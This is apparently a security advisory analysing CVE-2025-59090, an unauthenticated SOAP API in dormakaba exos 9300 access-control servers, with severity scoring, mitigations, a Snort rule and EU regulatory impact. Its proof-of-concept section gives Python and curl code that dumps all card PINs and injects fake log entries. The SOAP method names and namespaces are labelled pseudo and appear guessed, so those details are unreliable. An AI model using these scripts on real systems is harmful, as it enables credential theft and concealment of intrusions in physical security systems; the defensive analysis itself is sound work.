Comprehensive Technical Analysis of EUVD-2025-206366 (CVE-2025-59090)

Vulnerability in dormakaba exos 9300 SOAP API (Unauthenticated Access)

1. Vulnerability Assessment & Severity Evaluation

Vulnerability Overview

EUVD-2025-206366 (CVE-2025-59090) describes a critical authentication bypass vulnerability in the dormakaba exos 9300 server, where a SOAP API exposed on TCP port 8002 does not enforce authentication. This allows unauthenticated attackers to:

• Inject arbitrary access log events (potentially obscuring malicious activity).
• Query 2FA PINs associated with enrolled chip cards (enabling credential theft or unauthorized access).

CVSS v4.0 Severity Analysis

Metric	Value	Explanation
AV (Attack Vector)	N (Network)	Exploitable remotely over the network.
AC (Attack Complexity)	L (Low)	No special conditions required; straightforward exploitation.
AT (Attack Requirements)	N (None)	No user interaction or prior access needed.
PR (Privileges Required)	N (None)	No authentication required.
UI (User Interaction)	N (None)	No victim interaction needed.
VC (Vulnerable System Confidentiality Impact)	H (High)	Attacker can extract sensitive 2FA PINs.
VI (Vulnerable System Integrity Impact)	H (High)	Attacker can manipulate access logs.
VA (Vulnerable System Availability Impact)	N (None)	No direct impact on system availability.
SC (Subsequent System Confidentiality Impact)	N (None)	No lateral movement or further data exfiltration implied.
SI (Subsequent System Integrity Impact)	N (None)	No downstream integrity impact.
SA (Subsequent System Availability Impact)	N (None)	No cascading availability impact.

Base Score: 9.3 (Critical) The vulnerability is remotely exploitable without authentication, leading to high confidentiality and integrity impacts, justifying its critical severity rating.

---

2. Potential Attack Vectors & Exploitation Methods

Attack Surface

• Exposed SOAP API (Port 8002/TCP) – The primary attack vector.
• Network Accessibility – If the exos 9300 server is reachable (e.g., on an internal network, DMZ, or misconfigured firewall), it is vulnerable.

Exploitation Steps

1. Discovery & Reconnaissance

   • Attacker scans for open TCP port 8002 (e.g., using nmap -p 8002 <target>).
   • Identifies the SOAP API via WSDL enumeration (e.g., http://<target>:8002/?wsdl).

2. Unauthenticated API Abuse

   • Access Log Injection:
     • Attacker crafts a SOAP request to inject fake log entries (e.g., spoofing legitimate access events).
     • Example payload (pseudo-SOAP):

       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:log="http://exos.dormakaba.com/log">
          <soapenv:Header/>
          <soapenv:Body>
             <log:CreateLogEvent>
                <log:UserID>admin</log:UserID>
                <log:EventType>AccessGranted</log:EventType>
                <log:Timestamp>2026-01-26T12:00:00Z</log:Timestamp>
             </log:CreateLogEvent>
          </soapenv:Body>
       </soapenv:Envelope>
       

   • 2FA PIN Extraction:
     • Attacker queries the API for chip card PINs (if enrolled).
     • Example payload (pseudo-SOAP):

       <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:auth="http://exos.dormakaba.com/auth">
          <soapenv:Header/>
          <soapenv:Body>
             <auth:GetCardPINs>
                <auth:CardID>*</auth:CardID> <!-- Wildcard to dump all PINs -->
             </auth:GetCardPINs>
          </soapenv:Body>
       </soapenv:Envelope>
       

3. Post-Exploitation Impact

   • Log Tampering: Attackers can erase evidence of unauthorized access.
   • Credential Theft: Extracted 2FA PINs can be used for physical access bypass (e.g., door entry systems).
   • Lateral Movement: If exos 9300 integrates with other systems (e.g., Active Directory, building management), further compromise may be possible.

Exploitation Tools & Techniques

• Manual Exploitation: Using curl, Postman, or SoapUI to send crafted SOAP requests.
• Automated Exploitation: Custom scripts (Python, PowerShell) leveraging requests or zeep (SOAP library).
• Metasploit Module: If a public exploit is developed, it may be integrated into frameworks like Metasploit.

---

3. Affected Systems & Software Versions

Vulnerable Products

Product	Vendor	Affected Versions	Fixed Versions
Kaba exos 9300	dormakaba	< 4.4.0	4.4.0+ (requires manual mitigation if not patched)

Deployment Context

• Physical Security Systems: exos 9300 is used in access control, time & attendance, and visitor management systems.
• Enterprise & Critical Infrastructure: Deployed in government, healthcare, financial, and industrial sectors across Europe.
• Network Exposure Risks:
  • Internal Networks: If accessible via LAN, insider threats or compromised hosts can exploit it.
  • Internet-Facing: If misconfigured (e.g., exposed to the internet), remote attackers can exploit it.

---

4. Recommended Mitigation Strategies

Immediate Actions (Workarounds)

1. Network-Level Protections

   • Firewall Rules: Block TCP port 8002 from unauthorized networks (e.g., restrict to trusted VLANs).
   • Network Segmentation: Isolate exos 9300 servers in a dedicated security zone.
   • VPN/Zero Trust: Enforce MFA and strict access controls for remote administration.

2. Temporary API Restrictions

   • IP Whitelisting: Restrict SOAP API access to approved management IPs.
   • Disable Unused APIs: If SOAP is not required, disable it via exos 9300 configuration.

3. Monitoring & Detection

   • SIEM Alerts: Monitor for unusual SOAP API calls (e.g., GetCardPINs requests).
   • Log Review: Audit access logs for anomalous entries (e.g., log injections).

Long-Term Remediation

1. Patch Management

   • Upgrade to exos 9300 v4.4.0+ (or latest version) as soon as possible.
   • Vendor Advisory Compliance: Follow dormakaba’s security advisories.

2. API Hardening

   • Enforce Authentication: Require TLS + mutual authentication (mTLS) for SOAP API access.
   • Rate Limiting: Implement request throttling to prevent brute-force attacks.
   • Input Validation: Sanitize SOAP payloads to prevent XML injection or log poisoning.

3. Architectural Improvements

   • Zero Trust Architecture: Assume breach; enforce least privilege and micro-segmentation.
   • API Gateway: Deploy a reverse proxy (e.g., Kong, Apigee) to enforce authentication and logging.

4. Incident Response Preparedness

   • Forensic Readiness: Ensure immutable logs and backup configurations for post-breach analysis.
   • 2FA Rotation: If PINs were exposed, force re-enrollment of all chip cards.

---

5. Impact on the European Cybersecurity Landscape

Sector-Specific Risks

Sector	Potential Impact
Government & Defense	Unauthorized physical access to secure facilities, espionage risks.
Healthcare	Breach of patient data or restricted areas (e.g., pharmacies, labs).
Financial Services	ATM skimming, unauthorized access to vaults or data centers.
Critical Infrastructure	Disruption of power, water, or transport systems via physical access.
Enterprise	Corporate espionage, theft of intellectual property.

Regulatory & Compliance Implications

• GDPR (EU 2016/679): Unauthorized access to personal data (e.g., employee records) may trigger breach notifications.
• NIS2 Directive (EU 2022/2555): Critical infrastructure operators must report incidents and implement risk management measures.
• ENISA Guidelines: Failure to patch may violate EU cybersecurity best practices for physical security systems.

Threat Actor Interest

• APT Groups: State-sponsored actors may exploit this for espionage or sabotage.
• Cybercriminals: Ransomware gangs could use it for initial access or extortion (e.g., threatening to leak PINs).
• Insider Threats: Disgruntled employees or contractors may abuse this for unauthorized access.

---

6. Technical Details for Security Professionals

SOAP API Analysis

• Endpoint: http://<exos-9300-ip>:8002/soap
• WSDL Location: http://<exos-9300-ip>:8002/?wsdl
• Vulnerable Methods:
  • CreateLogEvent (Log injection)
  • GetCardPINs (2FA PIN extraction)
  • GetUserDetails (Potential user enumeration)

Proof-of-Concept (PoC) Exploitation

1. Enumerate WSDL (Reconnaissance)

curl -v http://<target>:8002/?wsdl

• Look for <wsdl:operation> tags to identify vulnerable methods.

2. Extract 2FA PINs (Exploitation)

import requests
from zeep import Client

# Target SOAP API
wsdl_url = "http://<target>:8002/?wsdl"
client = Client(wsdl=wsdl_url)

# Query all card PINs (unauthenticated)
response = client.service.GetCardPINs(CardID="*")
print(response)

3. Inject Fake Log Entry (Log Poisoning)

import requests

soap_payload = """
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:log="http://exos.dormakaba.com/log">
   <soapenv:Header/>
   <soapenv:Body>
      <log:CreateLogEvent>
         <log:UserID>admin</log:UserID>
         <log:EventType>AccessGranted</log:EventType>
         <log:Timestamp>2026-01-26T12:00:00Z</log:Timestamp>
      </log:CreateLogEvent>
   </soapenv:Body>
</soapenv:Envelope>
"""

headers = {"Content-Type": "text/xml"}
response = requests.post("http://<target>:8002/soap", data=soap_payload, headers=headers)
print(response.text)

Detection & Forensics

• Network Signatures:
  • Snort/Suricata Rule:

    alert tcp any any -> $EXOS_SERVERS 8002 (msg:"Unauthenticated SOAP API Access - CVE-2025-59090"; flow:to_server,established; content:"GetCardPINs"; nocase; sid:1000001; rev:1;)
    

• Log Analysis:
  • Check for unexpected CreateLogEvent entries with spoofed timestamps.
  • Look for GetCardPINs requests from unauthorized IPs.

Hardening Recommendations

Control	Implementation
Authentication	Enforce TLS 1.2+ and client certificates (mTLS).
Network Security	Restrict port 8002 to management VLANs.
API Security	Deploy a WAF (e.g., ModSecurity) to block malicious SOAP payloads.
Logging	Enable detailed SOAP API logging and SIEM integration.
Patch Management	Automate updates for exos 9300 firmware.

---

Conclusion

EUVD-2025-206366 (CVE-2025-59090) represents a critical authentication bypass in dormakaba’s exos 9300 system, enabling unauthenticated access to 2FA PINs and log manipulation. Given its high severity (CVSS 9.3) and potential for physical security breaches, organizations must:

1. Immediately apply patches (exos 9300 v4.4.0+).
2. Restrict network access to the SOAP API.
3. Monitor for exploitation attempts via SIEM and IDS/IPS.
4. Conduct a forensic review if compromise is suspected.

Failure to mitigate this vulnerability could lead to regulatory penalties, data breaches, and physical security incidents, particularly in critical infrastructure and high-security environments across Europe.